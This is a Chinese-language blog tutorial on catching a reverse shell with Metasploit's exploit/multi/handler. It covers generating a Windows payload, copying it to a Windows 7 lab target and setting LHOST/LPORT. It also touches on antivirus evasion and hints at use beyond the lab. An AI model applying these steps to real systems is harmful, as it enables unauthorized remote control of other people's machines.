MSF里侦听模块的使用教程 exploit/multi/handler

时间:2024-04-07 18:22:52

标题关于MSF侦听模块的第一次使用

侦听模块exploit/multi/handler在使用这个模块的时候也被这个功能惊呆了,不管外网内网都能反弹shell,就是windows10的防火墙过不去,windows7的查不到,可能不更新的原因吧。如果想过墙只能自己加免杀的代码喽,反正我是还没学到呢。或者去百度shellter下载剥壳机自己加免杀的,有两个版本免费版和专业版,本人亲测免费版过不了windows10的墙也不知道能过啥,专业版买不起,有钱可以试试,估计windows10墙是杀不掉的,好了,不说废话了。开始实操!

准备工作:虚拟机linux kali4.0 靶机windows7

首先去https://www.cnblogs.com/backlion/p/6000544.html在里面有各种msf生成payload命令,根据自己的需求来生成payaload我们这里是windows7的靶机所以选生成windows的payload复制粘贴到一个新建的txt文档上。
MSF里侦听模块的使用教程 exploit/multi/handler修改里面的LHOST和LPORT值 注意LHOST值改成kali主机IP 也就是使用侦听模块的kali LPORT改成一个没用端口这里我用的1124
MSF里侦听模块的使用教程 exploit/multi/handler把这段代码复制到kali终端里执行生成一个shell.exe文件
MSF里侦听模块的使用教程 exploit/multi/handler在文件夹里面找到这个shell.exe文件复制到靶机windows7里面我这里是复制的各位用的时候看你们的手段了。

MSF里侦听模块的使用教程 exploit/multi/handler
好了到这里就可以利用侦听模块了在msf下进入到侦听模块中 use exploit/multi/handler
MSF里侦听模块的使用教程 exploit/multi/handler在侦听模块中加载payload攻击模块也就是刚才自己生成的那个模块
MSF里侦听模块的使用教程 exploit/multi/handlershow options 查看配置在这里我们需要配置一下LHOST 和 LPORT
MSF里侦听模块的使用教程 exploit/multi/handlerLHOST和LPORT的配置和刚才修改文本中的值一样
set lhost 192.168.50.125
set lport 1124
MSF里侦听模块的使用教程 exploit/multi/handlershow options查看是否配置完成
MSF里侦听模块的使用教程 exploit/multi/handler这里我们配置完成之后就可以run运行侦听了 这里我们点击windows7里面shell.exe文件,kali成功拿到shell
MSF里侦听模块的使用教程 exploit/multi/handler接下来你们懂的,嘿嘿!!!

这里在教大家一个实用的命令在命令行下输入chcp 65001解决乱码问题
本人亲测外网内网均可使用windows10只要你能解决防火墙和杀毒软件问题拿到shell也没问题反正我是不会了,